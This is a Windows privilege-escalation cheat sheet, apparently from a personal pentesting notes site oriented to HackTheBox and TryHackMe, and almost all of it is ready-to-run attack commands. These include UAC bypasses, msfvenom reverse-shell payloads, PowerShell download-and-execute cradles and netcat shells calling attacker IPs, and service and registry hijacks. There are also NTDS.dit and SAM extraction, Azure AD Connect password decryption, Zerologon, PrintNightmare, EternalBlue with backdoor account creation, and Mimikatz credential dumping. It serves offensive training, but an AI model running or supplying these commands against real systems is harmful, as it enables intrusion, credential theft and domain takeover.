TryhackmeHackthebox

PrivilageEsc Windows πŸ‘‘

01. Common Tricks

01.1 UAC Bypass

  • DLL Hijacking UAC Bypass. (SystemPropertiesAdvanced.exe) Click here for more!

## Source : https://egre55.github.io/system-properties-uac-bypass/
## ------------------| Check if we are vuln?
IWR http://10.10.14.38/sigcheck64.exe -outfile sigcheck.exe
.\sigcheck.exe -accepteula -m C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe | findstr autoElevate
## If is true; we are good to go!!

## ------------------| Create backdoor dll file
https://docs.h4rithd.com/tools/shells-payloads#09.-dll-hijack

## ------------------| Exploit
copy srrstr.dll C:\Users\<USER>\appdata\local\microsoft\windowsapps\srrstr.dll
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe 
### If you get any error saying "This operation requires an interactive window". 
### You should use any kind of C2 (Use GreatSCT/MSBuild to launch Meterpreter)        

## ------------------| Use with interactive shell
### Create payload and gain shell using following methord
### https://docs.h4rithd.com/tools/shells-payloads#10.-greatsct
### migrate the process to explorer.exe
meterpreter > ps -S explorer
meterpreter > migrate <PID>
meterpreter > shell
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe

01.2 If you have, in or can?

## ------------------| How to check
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

## From the output that the registry named β€œAlwaysInstallElevated” exists 
## with a dword (REG_WORD) value of 0x1, 
## which means that the AlwaysInstallElevated policy is enabled.
## Any user can run msi file.

## ------------------| Exploit 
## Create msfvenom payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f msi > pw3n.msi      
## or
msfvenom -p windows/x64/exec CMD="cmd /c powershell iex(new-object net.webclient).downloadstring('http://10.14.14.7/shell.ps1')" -f msi > pw3n.msi  


## Execute the MSI package file on the Windows command prompt
msiexec /quiet /qn /i pw3n.msi
## /quiet = Suppress any messages to the user during installation
## /qn = No GUI
## /i = Regular (vs. administrative) installation

  • SeBackupPrivilege and SeRestorePrivilege has?

## ------------------| How to check is enabled
whoami /all | findstr "SeBackupPrivilege SeRestorePrivilege"

## ------------------| Copy those SYSTEM Hives to current directory
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

#### Then we need to copy Active Directory Domain Database also known as ntds.dit

## ------------------| Create diskshadow script on local 
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

## ------------------| Convert the script to Windows format and upload it.
unix2dos script.txt

## ------------------| Use Diskshadow to backup C drive
diskshadow.exe /s script.txt
## The entire file system can now be accessed via the E: drive
ls E:

## ------------------| Use robocopy to backup the E:\Windows\ntds\ntds.dit file.
robocopy /B E:\Windows\ntds\ .\ ntds.dit
# Then download all SAM, SYSTEM and NTDS.DIT file then you can use secretsdump.py to get admini hash   

## ------------------| Using wbadmin.exe
## Use archival smb on samba
## smb share and the share needs to be formated as NTFS/ReFS. follow below commands to do so.
dd if=/dev/zero of=ntfs.disk bs=320M count=2
losetup -fP ntfs.disk
losetup -a
mkfs.ntfs /dev/loop0
mount /dev/loop0 ./

echo y | wbadmin start backup -backuptarget:\\10.10.14.22\share\ -include:c:\windows\ntds\ntds.dit

  • If you has SeLoadDriverPrivilege ?

## ------------------| Download and upload following files to machine
wget https://github.com/FuzzySecurity/Capcom-Rootkit/raw/master/Driver/Capcom.sys
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/EoPLoadDriver.exe   
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/ExploitCapcom.exe   

## ------------------| Create payload and upload
msfvenom  --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe  

## ------------------| Exploit
copy h4rithd.exe C:\Windows\Temp\h4rithd.exe # Must need, then start listner
.\ExploitCapcom.exe

  • If the user is in DnsAdmins group?

## ------------------| Create payload
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > h4rithd.dll   

## ------------------| Create SMB share on local machine 
impacket-smbserver share ./

## ------------------| Do this on owned remote box
dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\<IP>\<Path-To-Dll-File>
sc.exe stop dns
## Create netcat listner and then 
sc.exe start dns

  • If you have GenericAll on user jorden

## ------------------| Enable PreAuth for user Jorden 
Get-ADUser jorden | Set-ADAccountControl -DoesNotRequirePreAuth $true

## ------------------| Then run this
impacket-GetNPUsers htb.local/jorden -dc-ip 192.168.3.203 -no-pass

  • If you have GenericWrite on any services

## ------------------| Check the command
sc.exe 

## ------------------| If it is succcess then Exploit [Space must]
sc.exe config UsoSVC binpath= "\"c:\windows\system32\cmd.exe /c powershell C:\\Windows\\system32\\spool\\drivers\\color\\rev.ps1\""   
sc.exe stop UsoSVC 
sc.exe config UsoSVC start=auto
sc.exe start UsoSVC

  • If you have xp_dirtree ?

## Turn on responder
sudo responder -i tun0

## Execute 
sqlcmd -Q "xp_dirtree \\YourIP\test"

## Get the NTLM hash and crack with 
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

  • If you are on Azure Admins group?

## Read this blog
https://blog.xpnsec.com/azuread-connect-for-redteam/

## Methodology
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)

  • If you are in member of Event Log Readers group.

wget https://raw.githubusercontent.com/RamblingCookieMonster/PowerShell/master/Get-WinEventData.ps1  
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.25/Get-WinEventData.ps1')

# Simple example showing the computer an event was generated on, the time, and any custom event data
Get-WinEvent -LogName system -max 1 | Get-WinEventData | Select -Property MachineName, TimeCreated, e_*  

# Find lockout events on a domain controller
Get-WinEvent -ComputerName DomainController1 -FilterHashtable @{Logname='security';id=4740} -MaxEvents 10 | Get-WinEventData | Select TimeCreated, e_TargetUserName, e_TargetDomainName     

#  Command line process login (A new process has been created)
Get-WinEvent -FilterHashtable @{Logname='security';id=4688} | Get-WinEventData | Select TimeCreated,MachineName,e_CommandLine | ft -autosize -wrap

## Check this out for windows event codes
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx

  • If you are on WSUS Administrators group? SharpWSUS

wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/SharpWSUS/SharpWSUS.exe
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/PsExec64/PsExec64.exe -O psexec.exe                               

.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\psexec.exe" /args:"-accepteula -s -d -accepteula -s -d C:\\Users\\sflowers\\Documents\\nc.exe -e cmd 10.10.14.4 4545" /title:"LocalUpdate"               
.\SharpWSUS.exe approve /updateid:<ID> /computername:<HOSTNAME.DOMAIN> /groupname:"LocalUpdate"
### Wait for 5-6 minutes
.\SharpWSUS.exe check /updateid:<ID> /computername:<HOSTNAME.DOMAIN>

  • If you are member of Administrators group, but still stuck?

## List Administrators group members
net localgroup Administrators

## Use this simple methord to bypass UAC
net use h: \\127.0.0.1\c$
h:
dir

  • If you are in LAPS_Readers

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$computers | Export-Csv -path c:\windows\temp\laps.csv" -NoTypeInformation

  • Hijacking/Migrating login sessions.

## ------------------| Check who are logged into the machine, what sessions are available?   
tasklist /v 

## ------------------| Get into a session
## Create payload 
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe   
sudo msfdb run 
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT <PORT>
run
meterpreter > ps
## Search explorer.exe; becouse it's more stable then copy the PID value
migrate <PID>

01.3 Service / Registry Exploits

## ------------------| Enumarations [Must have SERVICE_START & SERVICE_STOP permissions]
.\winPEASany.exe quiet servicesinfo
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"     

## ------------------| Check Permissions
icacls "C:\Program Files\...\<PATH>\..\pro.exe"
### Check BUILTIN\Users:(I)(F) permission

## ------------------| Check for particular service name
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -uwcqv user <service_name>
accesschk.exe /accepteula -ucqv <ServiceName>

## ------------------| Exploit
## Check current status
sc qc <service_name>
sc query <service_name>
## Set binary path
sc config <service_name> binpath= "\"C:\Windows\Temp\shell.exe\""
## Start service
net start <service_name> 
sc STOP <service_name>
sc START <service_name> 
## Set automactic start
sc config <service_name> start= auto
## Remove dependancy 
sc config <service_name> depend= ""

## ------------------| Restart service 
cmd
wmic service where caption="<ServiceName> get name, caption, state, startmode
## if StartMode is Auto
## Check if we have restart machine privilages
whoami /priv

  • Insecure Service Executables

## ------------------| Check 
### RW Everyone
.\accesschk.exe /accepteula -quvw "C:\<PATH>.exe"
### SERVICE_START & SERVICE_STOP permissions 
.\accesschk.exe /accepteula -uwcqv user <service_name>

## ------------------| Exploit
## Backup origianl one then replace with shell.exe
## Start the service
net start <service_name> 
sc STOP <service_name> 
sc START <service_name> 
## ------------------| Intro
C:\Program Files\One Folder\Two Folder\Executable.exe
C:\Program.exe
C:\Program Files\One.exe
C:\Program Files\One Folder\Two.exe
C:\Program Files\A Subfolder\Two Folder\Executable.exe

## ------------------| Check unqoted paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v "'"

## ------------------| Check if we have 
### SERVICE_START & SERVICE_STOP permissions
.\accesschk.exe /accepteula -uwcqv user <service_name>
###  Write permission [RW BUILTIN\Users]
.\accesschk.exe /accepteula -uwcqv -uwdq <path>

## ------------------| Replace & start service
move payload.exe "C:\Program Files\...\<SUB DIR>\<SUB>.exe"
net start <service_name> 
sc STOP <service_name> 
sc START <service_name>

  • Weak Registry Permissions

## ------------------| Verify [Check for RW NT AUTHORITY\INTERACTIVE]
Get-Acl HKLM:\<ServicePath>\<ServiceName> | Format-List
.\accesschk.exe /accepteula -uvwqk HKLM:\<ServicePath>\<ServiceName> 

## ------------------| Check if we can start the service
.\accesschk.exe /accepteula -ucqv user <ServiceName>

## ------------------| Check Current values [ImagePath & ObjectName == LocalSystem]
reg query HKLM:\<ServicePath>\<ServiceName> 

## ------------------| Add new value
reg add HKLM:\<ServicePath>\<ServiceName> /v ImageaPath /t REG_EXPAND_SZ /d C:\Windows\Temp\shell.exe /f    
net start <service_name>

02. Tools

02.1 PowerUp

## ------------------| Download and execute
C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUp.ps1')" 

## ------------------| Best check
Invoke-AllChecks
CurrentUserTokenGroupSid 
Get-RegistryAutoLogon

## ------------------| Check other functions
cat PowerUp.ps1 | grep -Ei '^function' | grep '{$' | grep '-' | awk '{print $2}'

02.2 PowerUpSQL

# Download 
wget https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1

# Upload 
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUpSQL.ps1')

# Execute commands
Get-SQLInstanceLocal -Verbose
Invoke-SQLUncPathInjection -Verbose
Invoke-SQLImpersonateService -Verbose
Invoke-SQLEscalatePriv -Verbose
$Targets | Invoke-SQLOSCLR -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSPython -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20

02.3 Seatbelt

# Run ALL enumeration checks
Seatbelt.exe -group=all

02.4 SecretsDump

## ------------------| If you have SAM and SYSTEM files on your hand
impacket-secretsdump -sam SAM -system SYSTEM local

## ------------------| Remote
impacket-secretsdump htb.local/h4rithd:'Passw0rD$'@10.10.10.161

# 31d6cfe0d16ae931b73c59d7e0c089c0 <-- blank
# aad3b435b51404eeaad3b435b51404ee <-- blank [LM]

## ------------------| Remote NTDS
## Copy ntds file
robocopy /B C:\Windows\ntds .\ntds ntds.dit
## Copy sam and system file then run
impacket-secretsdump -sam SAMFILE -system SYSTEMFILE -ntds NTDS.DIT local

## ------------------| Local NTDS
impacket-secretsdump -system ntds.bin -ntds ntds.dit local
## ntds.bin: MS Windows registry file, NT/2000 or above
## ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1

03. Common Exploits

03.0 JuicyPotatoNG (New)

## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# Check if "SeImpersonatePrivilege or SeAssignPrimaryToken is Enabled" we are good!! πŸ‘ŒπŸ‘ŒπŸ‘Œ

## ------------------| Download to local machine
wget https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip                                                             
unzip JuicyPotatoNG.zip

## ------------------| After upload it on victim's machine create bat file
echo "powershell -EncodedCommand SQBFAFgAKABOA.....ApAA==" > shell.bat
type C:\programdata\shell.bat

## ------------------| Run
.\JuicyPotatoNG.exe -t * -p <fullPath>\shell.bat

03.1 Juicy Potato (Abusing the golden privileges)

## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# Check if "SeImpersonatePrivilege or SeAssignPrimaryToken is Enabled" we are good!! πŸ‘ŒπŸ‘ŒπŸ‘Œ

## ------------------| Create .bat script
## Shell through Netcat 
echo START C:\<path>\nc.exe -e powershell.exe YourIP YourPort > sh3ll.bat
## Shell through Powershell 
cmd.exe /c powershell -ep bypass IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1')   

## ------------------| List CLSID's
.\JuicyPotato.exe -z -l 100

## ------------------| Execute 
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.bat -l 1337  
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.exe -l 1337  

## ------------------| General options
# Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both  
-p <program>: program to launch
-l <port>: COM server listen port

# Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

  • Click here to view CLSIDs

03.2 RoguePotato (No more JuicyPotato? Old story, welcome RoguePotato!)

## ------------------| Run Chisel to bind port 9999
chisel server --reverse --port 1337 ## From Our end
.\chisel64.exe client <MyIP>:1337 R:9999:localhost:9999 ## From Attackers end

## ------------------| Run socat to catch 135 
sudo socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999 ## From Our end

## ------------------| Execute RoguePotato
.\RoguePotato.exe -r <MyIP> -e "powershell C:\Windows\Temp\rev.ps1" -l 9999
# or 
.\RoguePotato.exe -r <MyIP> -e "c:\windows\temp\h4rithd.exe" -l 9999

03.3 MultiPotato

## ------------------| Download
### Bit 64
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox64.exe -O Multipotato.exe 
### Bit 32
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox32.exe -O Multipotato.exe     

## ------------------| BindShell with SpoolSample PipeName
.\MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

## ------------------| CreateUser with modified PetitPotam trigger
.\Multipotato.exe -t CreateUser

## ------------------| CreateProcessAsUserW with SpoolSample trigger
.\Multipotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"

03.4 PrintSpoofer

# !!! Microsoft Visual C++ Redistributable Must installed

.\PrintSpoofer.exe -i -c "C:\\<PATH>\shell.exe"

03.5 Zerologon | CVE 2020-1472

git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472
python3 cve-2020-1472-exploit.py MULTIMASTER 10.10.10.179

# if exploit complte,
impacket-secretsdump -just-dc -no-pass MULTIMASTER\$@10.10.10.179

# Now you can login with this 
# '$' is used for machine account
impacket-psexec Administrator@10.10.10.179 -hashes 69cbf4a9b7415c9e1caf93d51d971be0:69cbf4a9b7415c9e1caf93d51d971be0

03.6 Fodhelper.exe - UAC Bypass

## ------------------| CMD
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ         
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS==" /f                 
C:\Windows\System32\fodhelper.exe

## ------------------| Powershell
$program = "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS=="
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

## ------------------| Remove
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

03.7 Serviio Insecure File Permissions

## ------------------| Enumarations
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr Serviio          
icacls "C:\Program Files\Serviio\bin\ServiioService.exe" # Check if we have BUILTIN\Users:(I)(F)

## ------------------| Exploit
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move revshell.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
net stop Serviio 
## or 
wmic service where caption="Serviio" get name, caption, state,startmode
whoami /priv | findstr SeShutdownPrivilege ## Disabled OK
shutdown /r /t 0

03.8 PrintNightmare

## ------------------| Verify vulnerability
impacket-rpcdump @<IP> | grep -A2 -B2 MS-RPRN 

## ------------------| Download and execute
wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare 
## If you get any kind of errors like ExecutionPolicy; try with evil-winrm
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD>  -s $(pwd)
CVE-2021-1675.ps1
menu
Invoke-Nightmare

## Then use psexec to login with new creds
impacket-psexec adm1n:'P@ssw0rd'@<IP>

03.9 EternalBlue (MS17-010)

## ------------------| Check
nmap -sV -Pn -p 445 --script smb-vuln-ms17-010 $IP

## ------------------| Setup
git clone https://github.com/helviojunior/MS17-010.git && cd MS17-010
virtualenv -p python2 venv
source venv/bin/activate
pip2 install impacket pycrypto # This will get an error; that's fine
python checker.py <IP>
msfvenom -p windows/shell_reverse_tcp LHOST=<YourIP> LPORT=4545 -f exe > rev.exe

## ------------------| Method I
python send_and_execute.py <IP> rev.exe

## ------------------| Method II
## Open zzz_exploit.py file and edit following lines
service_exec(conn, r'cmd /c net user h4rithd Password123 /add')
service_exec(conn, r'cmd /c net localgroup administrators h4rithd /add')
python zzz_exploit.py <IP>

03.10 Windows-Exploit-Suggester WES-NG

## ------------------| Install
git clone https://github.com/bitsadmin/wesng.git
cd wesng
chmod +x wes.py

## ------------------| Download latest definitions
./wes.py --update
./wes.py -u

## ------------------| Download latest version of WES-NG
./wes.py --update-wes

## ------------------| Determine vulnerabilities
./wes.py systeminfo.txt

## ------------------| Determine vulnerabilities using both systeminfo and qfe files
./wes.py systeminfo.txt qfe.txt

## ------------------| Determine vulnerabilities and output to file
./wes.py systeminfo.txt --output vulns.csv
./wes.py systeminfo.txt -o vulns.csv

## ------------------| Determine vulnerabilities explicitly specifying KBs to reduce false-positives
./wes.py systeminfo.txt --patches KB4345421 KB4487017
./wes.py systeminfo.txt -p KB4345421 KB4487017

## ------------------| Determine vulnerabilies filtering out out vulnerabilities of KBs that have been published before the publishing date of the most recent KB installed
./wes.py systeminfo.txt --usekbdate
./wes.py systeminfo.txt -d

## ------------------| Determine vulnerabilities explicitly specifying definitions file
./wes.py systeminfo.txt --definitions C:\tmp\mydefs.zip

## ------------------| List only vulnerabilities with exploits, excluding IE, Edge and Flash
./wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash
./wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash

## ------------------| Only show vulnerabilities of a certain impact
./wes.py systeminfo.txt --impact "Remote Code Execution"
./wes.py systeminfo.txt -i "Remote Code Execution"

## ------------------| Only show vulnerabilities of a certain severity
./wes.py systeminfo.txt --severity critical
./wes.py systeminfo.txt -s critical

## ------------------| Validate supersedence against Microsoft's online Update Catalog
./wes.py systeminfo.txt --muc-lookup

03.11 Windows Kernel Exploits

**Download all the Binary Files from : **https://github.com/SecWiki/windows-kernel-exploits

Microsoft Windows - Local Privilege Escalation (MS15-051)

wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip

USBPcap Null Pointer Dereference Privilege Escalation (CVE-2017-6178)

## ------------------| Information
# Date             - 07th March 2017
# Discovered by    - Parvez Anwar (@parvezghh)
# Vendor Homepage  - http://desowin.org/usbpcap/ 
# Tested Version   - 1.1.0.0  (USB Packet capture for Windows bundled with WireShark 2.2.5)
# Driver Version   - 1.1.0.0 - USBPcap.sys
# Tested on OS     - 32bit Windows 7 SP1 
# Vendor fix url   - not yet
# Fixed Version    - 0day
# Fixed driver ver - 0day

## ------------------| Check Vulnarable Version   
driverquery /v | findstr USBPcap.sys
type "C:\Program Files\USBPcap\USBPcap.inf"

## ------------------| Exploit
curl -o exploit.c https://www.exploit-db.com/raw/41542
gcc.exe -c exploit.exe exploit.c
./exploit.exe

04. Mimikatz

  • More command available at here!

  • Dump all user's ntlm hashes using lsass

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit" >> mimikatz-sam.out 
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> mimikatz-logonpasswords.out       

## ------------------| If you have lsass as Mini DuMP or Rekall
pip3 install pypykatz
pypykatz lsa minidump lsass.DMP --json

  • Set password for account

.\mimikatz.exe "lsadump::setntlm /user:USERNAME /ntlm:NTLMHASH" "exit"
## ------------------| Get file's Certificate Thumbprint value
cipher /c c:\users\file.txt | Select-String "Certificate thumbprint"
## Also you can get this using following command.
dir C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\ | Select Name  

## ------------------| Getting the certificate
.\mimikatz.exe "crypto::system /file:C:\Users\<UserName>\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\<Certificate_Thumbprint> /export" "exit"    
## Download the *.der file to your machine.

## ------------------| Getting the masterkey
gci C:\Users\tolu\AppData\Roaming\Microsoft\protect\
gci -hidden C:\Users\tolu\AppData\Roaming\Microsoft\protect\<SID_VALUE>\
.\mimikatz.exe "dpapi::masterkey /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\protect\<SID_VALUE>\<FileName> /password:<UserPassword>" "exit"     

## ------------------| Decrypting the private key
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\
gci C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE>\
.\mimikatz.exe "dpapi::capi /in:C:\Users\<UserName>\AppData\Roaming\Microsoft\Crypto\RSA\<SID_VALUE\<FILE> /masterkey:<SHA-1>" "exit"
## Download the *.pvk file to your machine.

## ------------------| Building & Installing the correct PFX
openssl x509 -inform DER -outform PEM -in *.der -out public.pem
openssl rsa -inform PVK -outform PEM -in *.pvk -out private.pem
openssl pkcs12 -in public.pem -inkey private.pem -password pass:<NewPassword> -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx       
## Copy the cert.pfx file to remote machine.
certutil -user -p <NewPassword> -importpfx cert.pfx NoChain,NoRoot

## ------------------| Data access
type "c:\users\file.txt"
PreviousLateral MovementNextActive Directory / SMB

Last updated